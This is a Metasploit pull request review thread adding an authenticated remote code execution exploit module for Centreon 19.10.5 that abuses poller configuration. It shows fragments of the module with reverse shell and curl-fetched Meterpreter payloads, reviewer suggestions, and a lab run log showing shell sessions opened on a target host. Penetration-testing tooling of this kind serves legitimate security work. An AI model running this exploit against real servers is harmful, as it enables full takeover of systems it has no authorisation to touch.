### PR TITLE
Centreon 19.10.5 Authenticated RCE

### PR DESCRIPTION
**Pull request by mekhalleh**
Add: New exploitation module for Centreon 19.10.5 - 'Pollers' Remote Command Execution

## Verification

List the steps needed to make sure this thing works (as in the following screenshot)
Capture du 2020-02-03 14-01-46

TODO:
* [x] documentation
* [ ] check is vulnerable

### CODE REVIEW

File: modules/exploits/linux/http/centreon_pollers_auth_rce.rb [hunk 1]
```diff
@@ -0,0 +1,311 @@
...
+            'PAYLOAD' => 'cmd/unix/reverse_bash'
+          }
+        ],
+        ['Meterpreter (Dropper)',
+          'Platform' => 'linux',
+          'Type' => :meterpreter,
+          'Arch' => ARCH_X64,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+            'CMDSTAGER::FLAVOR' => 'curl' # illegal characters: `~$^&"|'<>
```
Comment (acammack-r7) [inline modules/exploits/linux/http/centreon_pollers_auth_rce.rb]: Probably best to set this in the target as well with `'CmdStagerFlavor' => :curl`.

File: modules/exploits/linux/http/centreon_pollers_auth_rce.rb [hunk 2]
```diff
@@ -0,0 +1,311 @@
...
+    ## TODO: check
+
+    @cookies = get_session
+    logged = get_auth unless @cookies.empty?
+    if logged
+      case target['Type']
+      when :cmd_unix
+        execute_command(payload.encoded)
+      when :meterpreter
+        execute_command(generate_cmdstager.join)
```
Comment (acammack-r7) [inline modules/exploits/linux/http/centreon_pollers_auth_rce.rb]: Just for the off chance that more than one command line is generated by the command stager this should be:
```suggestion
        execute_command(generate_cmdstager.join(';'))
```

**Comment by bwatters-r7** [comment]
I'm going to link these two together.... https://github.com/rapid7/metasploit-framework/pull/12843

File: modules/exploits/linux/http/centreon_pollers_auth_rce.rb (hunk 1 above)
Comment (mekhalleh) [reply modules/exploits/linux/http/centreon_pollers_auth_rce.rb]: modified.

File: modules/exploits/linux/http/centreon_pollers_auth_rce.rb (hunk 2 above)
Comment (mekhalleh) [reply modules/exploits/linux/http/centreon_pollers_auth_rce.rb]: modified.

File: modules/exploits/linux/http/centreon_pollers_auth_rce.rb [hunk 3]
```diff
@@ -0,0 +1,312 @@
...
+        User input is not sanitized for safe use - and it is possible to gain a Remote Code Execution of the server
+        hosting the Centreon Service leading to a full server takeover with the user `apache`.
+      },
+      'Author' => [
+        'Omri Baso', # discovery
+        'Fabien Aunay', # discovery
+        'mekhalleh (RAMELLA Sébastien)' # this module
+      ],
+      'References' => [
+        # TODO: waiting for CVE
```
[the remark this answers is not in the document]
Comment (mekhalleh) [reply modules/exploits/linux/http/centreon_pollers_auth_rce.rb]: No any update, I read from commits, security fixes notes, ... but nothing found about.

Finally, I have downloaded the latest version (Mar. 05, 2020) from https://download.centreon.com/ and it is always exploitable.

Maybe it is bad feature.

File: modules/exploits/linux/http/centreon_pollers_auth_rce.rb [hunk 4]
```diff
@@ -0,0 +1,337 @@
...
+    ## Export configuration to reload to trigger the exploit.
+    poller_id = get_poller_id(poller_name)
+    if poller_id.nil?
+      print_bad('Could not trigger the vulnerability!')
+    end
+    restart_exportation(poller_id)
+  end
+
+  def get_auth
+    print_status("Send authentication request.")
```
Comment (space-r7) [inline modules/exploits/linux/http/centreon_pollers_auth_rce.rb]:
```suggestion
    print_status("Sending authentication request.")
```

File: modules/exploits/linux/http/centreon_pollers_auth_rce.rb [hunk 5]
```diff
@@ -0,0 +1,337 @@
...
+          'password' => datastore['PASSWORD'],
+          'submitLogin' => 'Connect',
+          'centreon_token' => token
+        }
+      )
+      return false unless response
+
+      if response.redirect?
+        if response.headers['location'].include?('main.php')
+          print_status('Successful authenticated.')
```
Comment (space-r7) [inline modules/exploits/linux/http/centreon_pollers_auth_rce.rb]:
```suggestion
          print_good('Successfully authenticated.')
```

File: modules/exploits/linux/http/centreon_pollers_auth_rce.rb [hunk 6]
```diff
@@ -0,0 +1,337 @@
...
+      'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'postcommand.php'),
+      'cookie' => @cookies,
+      'vars_post' => {'poller' => poller_id}
+    )
+    return false unless response
+
+    return true
+  end
+
+  def check
```
Comment (space-r7) [inline modules/exploits/linux/http/centreon_pollers_auth_rce.rb]: I think we can go ahead and remove this if the updated version still has the issue.

File: modules/exploits/linux/http/centreon_pollers_auth_rce.rb [hunk 7]
```diff
@@ -0,0 +1,337 @@
...
+    # TODO: Detection by version number (waiting to know the impacted versions).
+  end
+
+  def exploit
+    ## TODO: check
```
Comment (space-r7) [inline modules/exploits/linux/http/centreon_pollers_auth_rce.rb]:
```suggestion
```

File: modules/exploits/linux/http/centreon_pollers_auth_rce.rb (hunk 3 above)
[the remark this answers is not in the document]
Comment (space-r7) [reply modules/exploits/linux/http/centreon_pollers_auth_rce.rb]: If that's the case, we can go ahead and remove the comment. We can update this later if a CVE is assigned.

**Review by space-r7 — COMMENTED** [review]
I've just a few more suggestions ( mostly related to some of the comments within the module ). I went ahead and tested your module. It worked great, thanks!

```
msf5 exploit(linux/http/centreon_pollers_auth_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Send authentication request.
[*] Successful authenticated.
[*] Upload command payload on the target.
[*] Create new poller entry on the target.
[*] Reload the poller to trigger exploitation.
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.131:60754) at 2020-03-16 11:12:14 -0500

id
uid=48(apache) gid=48(apache) groups=48(apache),993(centreon-engine),994(centreon-broker),998(centreon),999(nagios)
uname -a
Linux centreon-central 3.10.0-1062.12.1.el7.x86_64 #1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 1? [y/N]  y
""

[*] 192.168.37.131 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(linux/http/centreon_pollers_auth_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Reverse shell (In-Memory)
   1   Meterpreter (Dropper)


msf5 exploit(linux/http/centreon_pollers_auth_rce) > set target 1
target => 1
msf5 exploit(linux/http/centreon_pollers_auth_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Send authentication request.
[*] Successful authenticated.
[*] Using URL: http://0.0.0.0:8080/2UfIVIvui3hQQO
[*] Local IP: http://192.168.1.141:8080/2UfIVIvui3hQQO
[*] Upload command payload on the target.
[*] Create new poller entry on the target.
[*] Reload the poller to trigger exploitation.
[*] Client 192.168.37.131 (curl/7.29.0) requested /2UfIVIvui3hQQO
[*] Sending payload to 192.168.37.131 (curl/7.29.0)
[*] Sending stage (3021284 bytes) to 192.168.37.131
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.131:60998) at 2020-03-16 11:31:45 -0500
[*] Server stopped.

meterpreter > getuid
Server username: uid=48, gid=48, euid=48, egid=48
meterpreter > sysinfo
Computer     : 192.168.37.131
OS           : CentOS 7.7.1908 (Linux 3.10.0-1062.12.1.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```

**Comment by space-r7** [comment]
## Release Notes

This adds an exploit module for Centreon `v19.10.5`. Authenticated remote code execution can be achieved via a `Poller` configuration.

**Pull request merged**